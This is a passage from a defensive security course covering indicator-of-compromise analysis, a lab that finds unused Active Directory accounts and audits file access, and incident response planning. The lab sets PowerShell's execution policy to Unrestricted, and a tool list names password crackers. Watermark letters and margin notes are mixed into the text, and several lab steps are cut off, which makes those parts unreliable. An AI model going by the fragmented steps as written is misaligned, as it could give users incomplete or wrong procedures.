While software does occasionally crash, repeated failures not attributable to other factors could
indicate a compromise. Testing software in a controlled environment will help you determine if
this truly is an IOC or just a false positive.
e
ut
Guidelines for Analyzing Indicators of Compromise
Guidelines for Analyzing
ib
Indicators of Note: All Guidelines for this lesson are available as checklists from the Checklist tile on the
Compromise CHOICE Course screen.
tr
Use these guidelines when analyzing potential IOCs.
is
When analyzing IOCs:
D
• Look out for known malicious software on a system.
• Look for known attack tools/security tools on a system that doesn't need them.
• Watch for modification of legitimate files to facilitate an attack.
or
• Monitor for keywords or suspicious information in email.
• Monitor for phishing attempts that indicate an actual account compromise.
• Review the startup, file association, and driver/service Registry entries for unknown keys and
e
values.
• Monitor typically unused ports for suspicious usage.
at
• Monitor how common ports are used to detect traffic that is using these ports for malicious
purposes.
lic
• Set a baseline for network bandwidth and routinely compare your current bandwidth to this
baseline.
• Monitor key systems like web servers that are common targets for disruption and defacement.
up
• Bolster physical security to prevent rogue hardware from attaching to the network.
• Monitor account usage carefully for suspicious or unauthorized behavior, like excessive failed
logins or new unknown accounts.
D
ACTIVITY 9-3
Analyzing Indicators of Compromise
Data File
e
C:\CNX0013Data\Performing Active Asset and Network Analysis\Get-UnusedAccounts.ps1
ut
Activity: Analyzing
Before You Begin Indicators of
Compromise
In this activity, you'll be using your Windows Server and your Kali Linux VM. A suspicious user
ib
account, testaccount, has already been added to the Active Directory domain. In a prior activity,
"Assessing Data Exfiltration," you created a C:\CurrentProjects\DT_Watch folder on your
tr
server.
Scenario
is
Your system administrators at Develetech have been seeing strange behavior on the domain
controller and have asked for your help in assessing this behavior. In particular, they've noticed
D
account activity from accounts they don't recognize. Additionally, the admins have a hunch that key
files may have gone missing, but they can't verify this information and have no way of knowing for
sure. These events may indicate an attacker has compromised the domain controller, but you need
to be certain before you make a call.
or
So, you'll examine the domain for suspicious user accounts, as well as implement auditing on key
files and folders to help track any access or modification to these sensitive objects. By evaluating
e
potential IOCs like these, you can more easily identify attacks on your networks and systems.
at
a) From your Windows Server, select the Start button, and then select Windows PowerShell ISE.
b) Select File→Open.
c) Open Get-UnusedAccounts.ps1 from the course data files.
up
D
ot
N
o
D
e
ut
As the comment indicates, this script will retrieve all Active Directory (AD) accounts in the domain
that have never been logged in and are in an enabled state:
• Get-ADUser is the main cmdlet that retrieves the account information based on the provided
ib
factors.
• The -F parameter tells the cmdlet to filter its results based on everything contained within the
curly braces.
tr
• The filter has two conditions: the first looks for any accounts whose last logon time is not like any
valid value (using a wildcard), and the second looks for accounts that are enabled. The -and
is
parameter indicates this is a logical AND operation—i.e., both conditions must be true.
• The -Properties * parameter indicates that the cmdlet is looking through all account
D
properties.
• The Get-ADUser cmdlet is then piped to the Select-Object cmdlet on the next line.
• The Select-Object cmdlet ensures that only three properties of any accounts matching the
e)
or
filter are returned: the logon count of the user, the name of the account, and the groups the
account is a member of.
In the Windows PowerShell prompt at the bottom of the window, enter Set-ExecutionPolicy
Unrestricted
e
f) In the Execution Policy Change dialog box, select Yes.
g) From the menu, select File→Run.
at
2. What can you conclude about the account listed in the results?
A: It hasn't been used yet, and appears to have been created as a backup or backdoor method for
access to the domain. The DC administrators may be helpful in verifying this account's purpose.
up
3. Assuming this account was created or used by an attacker, what could the
attacker have done to make it harder to spot as malicious?
D
A: The attacker could have given it a name more relevant to the company, especially if the company
has specific account naming conventions. Limiting the account's privileges may also make it less
likely to be monitored or audited.
ot
i) Verify that Everyone is underlined, indicating that Windows recognizes the group.
e
ut
ib
tr
is
D
j) Select OK.
k) In the Basic permissions section, check the Full control check box.
or
e
at
lic
up
D
ot
Note: You are not granting these permissions to use the folder; you are
enabling the usage of these permissions to be recorded.
N
d) Check both the Success and Failure check boxes and select OK.
e
ut
ib
tr
is
D
or
e
at
lic
up
a) Switch to your Kali Linux VM and open an SSH connection to the Windows Server using the
they've used before.
Administrator account.
b) In the shell, navigate to the C:\CurrentProjects\DT_Watch directory.
ot
e) Enter echo Hello there! > hello.txt to create a new text file in the directory.
o
D
e
ut
ib
tr
is
D
g) Enter del hello.txt to delete the file.
h) Exit the SSH session. or
Open Event Viewer and examine the audited events.
e
8.
a) Switch back to your Windows Server 2019 machine.
at
e) In the Filter Current Log dialog box, in the <All Event IDs> text box, type 4659
e
ut
ib
tr
is
D
or
e
at
lic
up
h) Review the General tab below the entry and confirm that your deletion of hello.txt was logged.
e
ut
ib
tr
i) From the Actions pane, select Clear Filter.
is
j) Review the detailed information about some of the other events that have a Task Category of File
System.
D
Note: Remember that you can sort, filter, and search the event log.
indicates an attempt to
10.Why is this level of auditing impractical for commonly used folders? list the contents of the
DT_Watch folder.
A: Answers may vary, but the volume of logs would be incredibly difficult, if not impossible, to
lic
manage.
A: Answers will vary, but could include: excessive login failures, unexplainable gaps in logs, unusual
levels of ICMP traffic or other networking protocols, unusually high access rates to the
N
Summary
In this lesson, you actively analyzed your network, systems, and other assets in order to catch
malicious behavior quickly and effectively. You used Windows and Linux as platforms to detect
these attacks. You then assessed how various situations and scenarios could indicate a compromise,
even if the signs aren't overt.
Encourage students to
Which operating system platform(s) do you see yourself using most to analyze
e
use the social
networking tools attack behavior?
ut
provided on the CHOICE A: Answers will vary. Students who work in organizations that employ Windows domains may stick with
Course screen to follow Windows-based tools and techniques, as these are the types of systems they need to protect. Still,
up with their peers after
plenty of Linux tools can analyze attacks on Windows computers, not to mention being fundamental
ib
the course is completed
to securing the Linux servers they may have. In all, it's likely students will be working at least
for further discussion
and resources to support somewhat with both platforms, even if they work more heavily with one. Students' answers may also
depend on their comfort level with each platform's command-line syntax.
tr
continued learning.
What are some of the most common IOCs you've seen in your organization or
is
an organization you're familiar with?
A: Answers will vary. The presence of malware is often a major IOC in any organization. Some students
D
may have experience with service disruption or defacement, while others may be used to more subtle
indicators like network traffic usage and file modification. Rogue accounts and other suspicious
access control behaviors are also common signs that a system or network is under attack.
or
Note: Check your CHOICE Course screen for opportunities to interact with your classmates,
peers, and the larger CHOICE online community about the topics covered in this course or
other topics you are interested in. From the Course screen you can also access available
e
resources for a more continuous learning experience.
at
lic
up
D
ot
N
o
D
e
ut
Lesson Time: 2 hours, 45 minutes
ib
tr
is
Lesson Introduction
D
Now that you've performed a comprehensive analysis of your network and other assets, you
need to prepare for what much of this analysis will reveal—the reality of a security incident
or
affecting your organization. Responding quickly, yet cautiously, to the inevitable can make
all the difference in preventing serious, long-term harm to the organization.
Lesson Objectives
e
at
TOPIC A
Deploy an Incident Handling and Response
Architecture
When you have to respond to an incident, you will be able to respond more efficiently and
e
effectively if you already have the right processes, personnel, and tools in place.
ut
Incident Handling and Response Planning
ib
Incident Handling and Before a security incident occurs, your organization should plan and implement an incident handling
Response Planning capability that includes skills, roles, procedures, processes, and tools to respond to security incidents.
Your goal should be to design an incident response plan that enables you to:
tr
• Detect compromises as quickly and efficiently as possible.
is
• Respond to incidents as quickly as possible.
• Identify the cause as effectively as possible.
D
In response to a security incident, your organization should do the following:
• Secure data, while limiting the immediate impact on customers and business partners.
• Contain the incident, preventing any further escalation.
Documentation
The incident response plan, as well as many of the specific policies, procedures, and guidelines
detailed in this lesson, should be incorporated in your overall organizational documentation. This
up
will ensure that there is an official source for you and your fellow security professionals to follow.
For example, you can document existing security configuration controls. You might be able to
quickly apply these configurations to mitigate the effects of an incident, saving you the time and
trouble of creating new configurations. Or, you may be able to identify when such configurations
D
have failed to prevent an incident from happening and need to be improved or replaced. These
configurations can also include hardening techniques to protect systems during an attack. You
should also document baseline configurations for systems and networks, so you can compare the
ot
current state of these assets to the baseline. By going through this preparation, it'll be easier to
identify anomalies that could indicate an incident.
N
Business Continuity Another major part of the planning process should center on recovering from a disaster or another
Planning (BCP) and large-scale incident. Once you've moved to the recovery phase, you might find it incredibly difficult
Disaster Recovery —and in some cases impossible—to fully recover your systems if you didn't adequately prepare.
Planning (DRP) Business continuity plans (BCPs) and disaster recovery plans (DRPs) are both ways to prepare for
contingencies.
A business continuity plan (BCP) details exactly how an organization ought to continue day-to-
day operations in the event of a service reduction or interruption that causes at least one critical
operation to fail. These operations can be either manual or automated. Risks cannot be completely
eliminated, nor can every threat be removed, but the organization should make a serious and
organized effort to identify and manage risks to help mitigate the effects of a disaster. The BCP
addresses infrastructure issues such as maintaining utilities, using high-availability or fault-tolerant
systems that can withstand failure, and creating and maintaining offsite data backups. Ideally, this
offsite backup will be sufficiently segmented from your main operations so as to remain unaffected
by a breach or disaster. Rather than rebuilding from the ground up, you can recover quickly and
with greater ease by using this backup.
A disaster recovery plan (DRP) is a policy that defines how people and resources will be
e
protected in a disaster, and how the organization will recover from the disaster. In any disaster
ut
situation, the safety of personnel is the first concern, regardless of the implications for physical and
information security. The DRP can include a list of individuals responsible for recovery, an
inventory of hardware and software, and a series of steps to take to respond to the disaster and
ib
rebuild affected systems.
Note: You may also have existing contingency strategies in the organization. You should review
tr
these and incorporate any parts that are still useful and relevant into your formal BCPs and
DRPs.
is
Site Book
D
A similar idea, and another good way to plan for disaster, involves creating a site book. A site book Site Book
is a document or collection of documents that take stock and inventory of all known assets,
or
configurations, protocols, and processes that make up a particular site. Instead of directly rebuilding
as in an offsite backup (which may not be feasible for your organization), a site book will enable you
to reconstruct your systems as they were, since no one person is likely to remember the thousands
of little intricacies in the organization's setup.
e
Information to include in site books:
at
• Hardware (serial numbers, MAC addresses, drive type/size, CPU type/speed, etc.)
• Software (operating systems, applications, scripts, add-ons, etc.)
lic
automate the process. Likewise, you need a process in place to update the records any time
something changes. The information in your site book will undoubtedly be highly sensitive and
mission critical in nature, so its security is paramount. Employ strong encryption to prevent this
ot
The process of responding to an incident consists of several steps. These steps may vary from The Incident Response
organization to organization. NIST SP 800-61r2, Computer Security Incident Handling Guide, which is Process
considered one of the most authoritative sources for incident response, outlines the following
process:
1. Preparation
2. Detection and analysis
e
ut
ib
tr
Figure 10-1: The NIST SP 800-61r2 incident response process.
is
Note: The incident response process is not always one directional—you can return to other
D
steps if you need to, as indicated in the figure.
Security Operations
Center (SOC)
Security Operations Center (SOC)
or
A security operations center (SOC) is a location where security professionals monitor and protect
critical information assets in an organization. SOCs are vital to security management because they
e
centralize and streamline the organization's security efforts to maximize its effectiveness. Because
at
SOCs can be difficult to establish, maintain, and finance, they are usually employed by larger
corporations that must protect serious sensitive information, like a government agency or a
healthcare company that deals in personally identifiable information (PII).
lic
SOCs, despite their differences in size, scope, and responsibility, tend to be designed with a few key
principles in mind. An SOC should be:
up
• Able to balance its size and its presence in the organization, without overstepping its bounds.
• Able to incorporate a wide variety of security processes into a single operations center.
ot
• Prepared to leverage its strongest processes while minimizing the use of its weakest ones.
• Staffed with motivated, skilled professionals and not overstaffed with under-qualified personnel.
• Able to protect the SOC's own systems and infrastructure from attack.
N
• Willing to collaborate with other SOCs to share valuable information on threat intelligence and
mitigation techniques.
o
Cybersecurity Incident Organizations will often form a cybersecurity incident response team (CSIRT) to help identify
Response Team and manage information security incidents. The individuals that make up the CSIRT are trained in
(CSIRT) proper collection and preservation techniques for investigating security incidents. NIST SP 800-61r2
identifies the following models for organizing such a team.
Central team One team handles incidents on behalf of the entire organization. This
approach is suitable for small organizations that are not geographically
dispersed.
Distributed team For larger or geographically dispersed organizations, it may be more
appropriate to have individual CSIRTs for different segments of the
organization or different geographic locations. The organizational
reporting structure, processes, policies, and personnel should coincide
e
among the various teams to ensure there is a consistent response across
ut
the organization, with information shared among the various CSIRTs.
Coordinating team An overarching central team can be added to provide guidance and
coordination among distributed teams.
ib
CSIRT Roles
tr
Regardless of the organizational model, members of the CSIRT may have certain roles and CSIRT Roles
is
responsibilities.
D
Role Responsibilities
Manager/team leader Supervises the CSIRT and ensures all team members are performing to
the best of their capabilities.
Investigator
Security specialist
or
Attempts to discover the impact and source of an incident.
Provides technical support to other team members when dealing with
e
specialized systems.
at
Help desk staff Provides technical support to employees and customers affected by an
incident.
Crisis communicator Effectively communicates to stakeholders the important details of an
lic
incident.
Auditor Reviews and evaluates existing security policies, procedures, and
up
Ongoing Training
N
It's true that all personnel, regardless of cybersecurity expertise, should be trained according to their
roles. This goes doubly for the CSIRT—the continuity of the business may depend upon every
member of the response team being kept up to date on the latest threats and countermeasures. A
o
team unprepared to combat the current threat landscape will not be running optimally, and may put
the organization in jeopardy in the face of a new type of attack. Therefore, members of the CSIRT
D
should undergo regular training, preferably every six months. The training regimen should not just
include an update on the threat landscape, but should also assess each member's technical aptitude
and ability to work with colleagues in a team.
External CSIRTs
Various factors may prevent your organization from forming and managing its own CSIRT. Having
yet another team to manage and support financially isn't always feasible, especially since CSIRTs
need to be ready at all times. That's why it may be in your best interest to outsource your CSIRT to
a business that specializes in incident response. Just keep in mind that it can be a challenge to
smoothly integrate an external source into your organization, so you still need to be prepared to
facilitate the CSIRT's needs when an incident does occur. If the incident transitions into a forensic
investigation, you may also need to retain the incident response provider so they can provide
thorough and accurate testimony to law enforcement. There is also a possibility that your CSIRT
will be a mix of both internal and external personnel.
e
ut
A Day in the Life of a It might seem obvious that the daily tasks of a CSIRT would consist of responding to computer
CSIRT security incidents, but in fact there are many different types of activities a CSIRT performs that may
not seem obvious from their title. Within any given day, a CSIRT member may need to perform the
ib
following types of tasks.
Task Description
tr
Take immediate action A first response includes taking actions such as:
is
in response to incidents
• Protecting systems and networks from intruder activity.
• Implementing response or workaround strategies.
D
• Examining other systems and networks to find additional signs of
intruder activity.
• Restoring systems and network operations, including patching,
Communicate CSIRT members often must coordinate with and call upon the expertise
effectively and skills of others, such as:
D
tabletop exercises will help them when the theoretical becomes reality.
Protect evidence, In the process of responding to a cybersecurity incident, the CSIRT must
privacy, and be careful not to destroy evidence if a crime has occurred in connection
confidentiality with the incident. The CSIRT must also be careful not to compromise
data that's meant to be kept private or confidential.
e
security incident. Record this information in a call list, and ensure the list is up to date.
2. Identify external individuals who need to be contacted in the event of a security incident,
ut
including any legal or regulatory agencies. Also record this information in a call list.
3. Determine when to notify the CSIRT members.
4. Determine when to escalate issues to more appropriate personnel, determine who those
ib
personnel are, and how to communicate the necessary information to them (e.g., by filling out
forms/checklists, directly contacting them by phone, etc.).
tr
5. Determine the secure channel(s) to use in primary communications.
6. Establish protocols for communicating out of band; that is, communicating through other secure
is
channels in case the primary channel is compromised.
7. Ensure that parties with privileged information do not release this information to untrusted
D
parties, whether intentionally or inadvertently.
8. Document and train individuals in the process.
9. Test the process and revise any part that fails during testing.
or
It's important to note that communication is not a function of one single phase; it occurs
throughout all phases of an incident, and is therefore something that you should support
continuously.
e
Internal and External Communication Plans
at
There are many different individuals with many different roles that could possibly be involved in an Internal and External
lic
incident that the CSIRT responds to. You might consider these individuals to be in the way, but you Communication Plans
shouldn't discount the context they can provide to the team during and after an incident. You
should therefore develop internal and external communication plans that address these individuals.
The following are some examples of internal and external stakeholders that could be relevant to
up
by an incident. It can also include customers whose PII was stolen in a breach.
• Internal departments like HR and marketing that may need to communicate the incident
to employees and customers: You may be required by laws or regulations to disclose certain
ot
incident, you may be obligated to inform the public of what happened. In these circumstances,
it's likely you'll need to go through the news media to reach as many affected parties as possible.
D
• The potential perpetrators of an incident: While they may deny their involvement, you can
still learn something about an incident based on their responses. Some may even confess and
provide you with crucial information, but you should consider that this information may be
inaccurate.
• Local law enforcement: The authorities can provide services to assist in your incident handling
efforts, or you may simply want to communicate the situation to them to prepare for legal action
in the future.
• System administrators: These personnel know better than anyone about the normal baseline
behavior for the network and its systems, so their input can be a great help in identifying a cause
and restoring operations.
• Managers and executives: It may be necessary to escalate certain response efforts up the chain
of command. These decision makers are ultimately in control of the organization, and incident
handling decisions that could profoundly affect operations should not be made without their
approval.
• Vendors you have a business relationship with: If an incident impacts a particular product or
group of products by one or more vendors, those vendors may be able to provide you with
e
support. Security vendors also offer tools and guidance to customers who may be experiencing
an incident.
ut
• Other CSIRTs and computer emergency response teams (CERTs) that can provide
valuable intelligence that may influence your response process: The sharing of knowledge
ib
with like-minded teams can drastically improve your efforts to identify, mitigate, and recover
from an incident.
tr
When communicating with these parties, a little grace will go a long way. Each of your CSIRT
members should be able to keep a level head and manage conflicts, no matter the circumstances.
Treating any one of these parties poorly may undermine the success of the incident response and
is
investigation.
D
Incident Identification
Actually identifying an incident has occurred and what its effects are can be the most challenging
Incident Identification
or
steps in the handling and response process. This is for several reasons, including the fact that
different detection mechanisms, both manual and automated, have varying levels of sensitivity and
accuracy. The success of these mechanisms will also depend on whether a threat is known or
e
unknown—an attack that has no precedent will be difficult to identify in a timely manner, or may
completely sidestep detection. Another major issue is that, depending on the size of an organization
at
and the nature of its assets, the number of alerts security personnel receive may be so large they
cannot be easily analyzed. How to prioritize incidents in case many occur at the same time may also
be an important issue that needs solving. Lastly, it may be essential for a first responder to have very
lic
esoteric knowledge of certain systems and the context in which those systems are put in place in the
organization. There may simply not be enough personnel with the required expertise.
up
Nevertheless, it is your job as a first responder to identify when a breach has occurred. To do so,
you must be on the lookout for indicators of compromise based on the data you've collected. As
you've seen, indicators of compromise (IOCs) come in many forms and come from many sources,
so it's vital that you're aware of every security asset your organization uses.
D
Incident Indicator The following table lists additional IOCs, both technical and non-technical, and the potential source
Sources of each IOC.
N
Use this as an
opportunity to provide Source Indicator Example
more examples or
sources, and ask Anti-malware software An alert generated when a virus signature is detected on a host
o
Network intrusion detection An alert generated after an automated port scan is detected.
system/network intrusion
prevention system (NIDS/
NIPS)
e
Network device logs An entry in the firewall log indicates a dropped connection
intended for a blocked port.
ut
Security information and event An alert is generated if anomalous behavior is detected in any
management (SIEM) relevant logs.
ib
Flow control device A higher amount of traffic across the network than normal
indicates an attempted denial of service (DoS) condition.
tr
Internal personnel Employee testimony indicates they may have witnessed a breach
in progress.
is
People outside the organization An external party claiming to be responsible for an attack
indicates this is the case.
D
Research Third-party research and vulnerability database information
indicates a new threat that could be targeting your organization.
would be corrupt data on a storage drive, a deleted list of clients, and stolen passwords. However,
incidents can have more intangible consequences that still cause harm to the organization. For
example, your organization may suffer economic damage by losing potential customers due to
D
website unavailability after a DoS attack. Your company's reputation may even be tarnished if
sensitive customer and employee data is stolen.
It is important not to underestimate the scope of an incident's impact on your organization. To
ot
ascertain the extent of the damage, you should communicate with members of the CSIRT, as well as
other employees, to identify every dimension of the organization that could possibly be affected by
the incident. You may not be aware of every little detail of every employee's day-to-day job, so it's
N
Incident identification and analysis efforts can be challenging. Even beyond the huge number of Incident Evaluation and
alerts generated daily, many of these alerts may end up being false positives. In the analysis phase, Analysis
you must be able to separate false positives from a real indicator of an incident.
Even if an alert or log entry is not a false positive and actually indicates something adverse has
occurred, this does not necessarily mean this is the result of an incident. Servers fail, workstations
crash, and files are modified due to errors caused by both machines and humans. Yet, these do not
automatically tell you whether your organization has just suffered a significant attack or an accident.
In many cases, it comes down to your judgment as a professional and the consensus of your team.
To aid you in making these judgments, you should not only consult with other security
professionals, but you should also correlate alerts, log entries, and other potential indicators. A
strong correlation will go a long way toward either indicating an incident has occurred or convincing
you that one has not.
An incident analysis can benefit from the following:
• Document all systems within your organization, including hardware, software, utilities, and so on.
This will ensure that nothing slips past your analysis.
e
• Consider these systems in terms of their criticality. Incidents targeting critical systems and
processes may require a different approach to prioritization.
ut
• Consider how the scope of an incident may impact recovery time. Complex and resource-
intensive systems may not be easily restored.
ib
• Set a baseline for normal behavior. This way, you'll be able to compare a system as it currently
exists against the baseline configuration, and if something is off, it will be easier to analyze the
divergence.
tr
• Retain logs from all sources. Incidents are sometimes identified months after the fact. Not
having these logs will severely impact your analysis efforts.
is
• Correlate events, alerts, and other potential indicators across all sources. Finding a pattern of
action that is replicated in both an NIDS and a host's system log will make it easier to determine
D
the method of an attack.
• Research reputable Internet sources for information. Consulting security industry websites and
security-centered forums may provide valuable insight into an incident.
• Properly document analysis findings in a database. Being able to quickly refer back to your
previous results may help you correlate and evaluate data as efficiently as possible.
e
at
Incident Containment
The methods for containing damage when responding to a security incident are unique to the
lic
Incident Containment
incident and the organization, but the following table outlines some of the general approaches.
Validate the incident The first step should be to actually validate and confirm that an incident
is taking place. You may be subject to false alarms, so you should be sure
of what you're dealing with before you start your containment tasks.
D
Ensuring the safety and The foremost concern of all managers involved with the security response
security of all is the safety and security of personnel. Second, facilities need to be
ot
personnel secured. Once these are done, the CSIRT can continue on with their tasks
to resolve the issue and return the organization's business functions back
to normal.
N
Removing devices Removing a malicious device from an organization's network may help
from the network combat a malicious code attack. By removing a device, you can stop the
when appropriate spread of the attack and contain it to the affected device.
o
Disabling In the event one device has been compromised, you can disable
D
e
accounts from infiltrating an entire network. The CSIRT can restore email once the
ut
known threat is eradicated.
Limiting access to Creating subnets on the network is a proactive step to contain damage by
affected subnets enabling you to quickly identify and disable a portion of the network
ib
without affecting the entire network.
Isolating the Take the compromised system offline without damaging evidence.
tr
compromised system
when appropriate
is
Treating the While waiting for the forensic analyst to arrive, treat the system as one
compromised system would any crime scene by preventing anyone from compromising the
D
as a crime scene system further or destroying evidence.
isolated specific portions of a network on subnets to stop a computer worm from spreading, you
can begin the process of removing the infection from the affected subnet.
lic
Whatever the situation may be, you must remember your primary goal as a first responder is to
return your operations to normal.
up
Note: Depending on the incident and its effects, containment, mitigation, eradication, and
recovery may all be part of the same process.
D
Incident Recovery
The steps you take to recover from an incident will depend greatly on the nature of the incident, as Incident Recovery
ot
well as the ways in which you prepared for just such an incident. The following are some examples
of incident recovery:
N
• If a malicious user deletes data from a database, you can restore that data if you had been
creating backups. A continuous 1:1 replication of that data will require minimal effort on your
part, but backups made in time intervals may leave some data incomplete or irrecoverable. If
o
possible, identify what you can about the data that was lost in the period of time since the last
backup was performed.
D
• If a distributed denial of service (DDoS) takes down your web servers, you may need to manually
reboot your servers and perform a health check on them before pushing them back to live status.
They should accept incoming connections gradually rather than all at once to prevent the servers
from overloading again. If you identified the source or sources of the malicious traffic, you can
also have the servers filter them.
• If an employee accidentally downloads malware onto their workstation, you can attempt to
remove it with anti-malware software. If the malware persists, you may need to wipe the entire
storage drive and reinstall the operating system. You can only truly recover once the malware is
completely gone from the system, and the user is trained to be more security aware.
In addition to the technical aspects of disaster recovery and business continuity, the CSIRT plays a
number of other roles:
• Provide leadership with information and response strategies: After an incident, the CSIRT
will be concerned with recovering systems and data, how to protect them from further attack,
and so forth. Meanwhile, leadership throughout the organization will consider how the incident
affects their departments or functional areas, and will have to make certain decisions. The
e
organization might have a crisis management team to coordinate an organization-wide response
to crises in general. The CSIRT can provide the crisis management team—comprising decision
ut
makers throughout the organization—with useful information to help them in this process.
• Provide information needed for crisis communications: Standards and regulations may
require specific communications to customers, partners, and various agencies, and good business
ib
practices will also require that you keep various parties informed, including dealing with public
relations or damage control in the press and social media. As various functions within the
tr
organization communicate information internally and externally, they will look to the CSIRT for
information regarding the estimated downtime, the scope of systems and data affected, and so
is
forth.
• Provide follow-up support for customer and partner relations: Following an incident,
customers and partners may have concerns about your organization's security operations. While
D
the organization should take steps to improve security, possibly addressing areas of risk
mitigation, preparedness, response, and recovery, some necessary follow-up may be a matter of
public relations, with the organization looking to security operations for leadership, ideas, and
information to support the effort.
occurs after the organization has successfully recovered from the incident. An after-action report
(AAR), or lessons learned report (LLR), is post-incident documentation that includes an analysis
lic
of security events and incidents that can provide insight into directions you may take to enhance
security for the future.
A significant component of your post-incident documentation will be summarizing and providing a
up
description of what happened during an incident. A description tailored to a general audience and
presented at a high level might include details such as the initial investigation into the incident that
determined what the issue was and what effect it was having; the impact and scope of an attack; an
overall timeline log of the incident that reports what happened and when; the general actions taken
D
example, a technical description of an attack might include the specific vectors the attack took and
the specific mechanisms it used in compromising certain systems. A technical report might also
include certain key logs as attachments, so trained personnel can easily validate and cross-reference
N
the claims that are made in the report with the actual evidence.
Not only should you describe what happened during an incident and how you responded, but
afterward, you should also document what this incident means for your security and how it might
o
affect your incident response plan. Essentially, you will be identifying the elements of your security
that need improving, and how you can go about improving them in the best way possible. The more
D
you learn from your successes and mistakes, the more fine tuned your judgment will be. This is an
invaluable skill to have, especially if you're called on to solve complex, open-ended problems.
e
• How did the teams react to the issue? Could they have solved the incident more quickly or
efficiently?
ut
• In the event of the same or a similar incident occurring, how would you respond differently?
• Do the answers to these questions necessitate a change in your security policy or an update to
the incident response plan?
ib
• Is there an action plan or remediation plan in place that will enable the organization to actually
implement these corrective actions?
tr
Note: Be sure to avoid assigning blame as part of the AAR. You want to encourage the CSIRT
is
and other personnel to improve, not discourage them.
D
Another component of an AAR is root cause analysis, or the effort to determine the incident's
catalyst. The most straightforward way to find the root cause is to keep asking the question, "What
or
was the immediate thing that allowed this to happen?" With each answer, you again ask the same
question, "What is the immediate thing that allowed that to happen?" You keep asking this question,
working your way backwards. Typically, the root cause can be uncovered in about six questions.
And typically, there will be more than one root cause.
e
Validation
at
The incident response team has a stake in whether or not the corrective actions they suggest actually
get put into place—after all, they shouldn't need to save the organization from the same type of
lic
incident that could have easily been avoided. That's why some teams go through a validation process
to ensure their suggested controls have the intended effect. The validation process can include
verifying the organization implements security patches in vulnerable systems, reconfigures user
up
permissions to ensure that attackers cannot easily exploit privileges, and implements a vulnerability
scanning regimen. If the response team feels that it did not receive enough actionable information
during an incident, they can also verify that security monitoring and logging services are up to par.
D
The CSIRT has a number of tools they can use to help handle security incidents. Keeping the toolkit Incident Handling Tools
up to date will contribute to the CSIRT working optimally. The following table lists a few common You may wish to inform
examples. students that many of
N
Create drive images EnCase, Clonezilla, FTK Imager covered in the next
lesson.
Display network shares BySoft Network Share Browser, NetShareWatcher
D
Manage user rights ManageEngine ADManager Plus, Windows® Users and Groups
control panel
Recover deleted data TestDisk, PhotoRec, Foremost
Sniff/analyze network packets Wireshark, Packetyzer, tcpdump
Crack passwords Cain & Abel, John the Ripper
e
an Incident Handling and Note: All Guidelines for this lesson are available as checklists from the Checklist tile on the
Response Architecture CHOICE Course screen.
ut
Follow these guidelines when deploying an incident handling and response architecture.
ib
Deploy and Incident Handling and Response Architecture
When deploying an incident handling and response architecture:
tr
• Ensure all of your incident handling efforts are planned and documented ahead of time.
• Draft BCPs and DRPs to ensure you are prepared in the event of a major contingency.
is
• Record asset and configuration information in a site book to aid in reconstructing efforts.
• If relevant to your organization, establish a CSIRT and the roles of each member.
D
• Ensure there is clear communication within the CSIRT.
• Plan for communication with other internal personnel as well as external parties.
• Employ the appropriate techniques for identifying incidents as well as their potential scope and
impact.
or
• Evaluate and analyze the effects of incidents to determine what kind of damage they can do to
the organization.
e
• Apply appropriate techniques to contain, mitigate, and eradicate incidents.
• Begin recovery of affected systems whenever feasible.
at
• Draft an AAR/LLR that identifies issues and suggested improvements in the wake of an
incident.
lic
ACTIVITY 10-1
Developing an Incident Response System
Data File
e
C:\CNX0013Data\Responding to Cybersecurity Incidents\NIST.SP.800-61r2.pdf
ut
Activity: Developing an
Before You Begin Incident Response
System
You'll be using your Windows 10 client in this activity.
ib
Before class starts,
consider printing the
Scenario incident handling forms
tr
One item on your to-do list is to create a formal incident response policy, but you haven't gotten students will fill in, in
around to it yet. This morning, you arrived in the office to concerns from one of your help desk case no printer is
personnel. She tells you Charles called to reset his domain account. He complained that he hadn't
is
available during class.
accessed it since the end of work yesterday, but it was locked when he came in this morning. What This is the start of an
makes this concerning is that Charles is a custodian of the systems that hold plans and schematics ongoing scenario that
D
for Develetech's products in development. spans many activities.
After investigating further, you find there were a number of remote access attempts on Charles'
account at 11:13 p.m. last night from the IP address 67.240.182.117. While looking over the logs for
or
the last 12 hours concerning that server, you find that Pat accessed files in the research and
development system this morning at 7:43 a.m. from an internal workstation, but Pat has been on
vacation for a week.
e
Are you under attack? If so, from where? What is the goal? You will have to develop your incident
response plan on the fly this time. The National Institute of Standards and Technology (NIST) has a
at
framework for incident response that you will lean on for your reactions to this incident.
If students are curious,
lic
publications/sp.
b) Go to and read Section 2.4.4 Dependencies within Organizations (page 26).
2. What members of the organization will help you deal with the current
ot
included here.
5. What additional questions would you ask about the incident based on what
you know so far?
A: Answers will vary, but they might include: Who is in the office today? What files were taken? Is
there any evidence of proprietary information being posted publicly?
e
printed earlier, or have open the PDF.
students print their own,
ut
assuming a printer is Note: Your instructor may have you work in groups to complete the form, and
available. Otherwise, might ask for a volunteer to share a completed example.
you may need to have
ib
students simply c) Fill in the form to the best of your knowledge.
brainstorm ideas instead
of recording them on the 7. Close the web browser.
tr
form.
Consider having the
is
class work together on
filling out the form, rather
than each student
D
completing their own. If
students fill in their own,
have them share their
results with the class.
Since there isn't
necessarily a strong link
yet between the failed
or
e
access attempts on
Charles' account and
at
other forms.
D
ot
N
o
D
TOPIC B
Mitigate Incidents
You've established an infrastructure and capability for incident handling and response. Now you
need to use that infrastructure to deal with events.
e
Countermeasures
ut
A countermeasure is an action taken to defend against the effects of some unwanted event or Make sure to put focus
incident. It is essentially synonymous with the idea of a security control, though "countermeasure" on the fact that some of
ib
has connotations of being more active and direct in its defense. In any case, countermeasures come these mitigation tactics
in the forms of the control categories mentioned earlier—technical, physical, and administrative. can be applied both
They are also applied in ways to prevent incidents from occurring as well as containing and preventively and
tr
responsively.
eradicating incidents that are ongoing.
Countermeasures
is
Incident responders and other security personnel employ countermeasures in many different areas
of the organization. There are some key points to consider when both designing and deploying such
countermeasures:
D
• Document all actions and processes that are required to implement countermeasures.
• Document all tools, technologies, devices, and systems that both implement countermeasures
and are affected by countermeasures.
or
• Identify the security requirements of your systems to help guide what countermeasures are
applicable and necessary.
• Identify areas where systems are able to integrate with countermeasures, or modify those systems
e
to enable such integration.
at
• Identify how certain systems interoperate with one another to ensure your countermeasures do
not have gaps in coverage or have undesired effects on other systems.
• Identify existing safeguards and whether or not they are adequate, including security features
lic
Identity and access management (IAM) is the process of protecting how users and devices are Identity and Access
represented in the organization, as well as how users and devices are granted access to resources Management (IAM)
ot
based on this representation. IAM combines the sometimes distinct functions of identity
management and access control into one comprehensive program. Concepts like authentication and
authorization are also a large part of IAM systems.
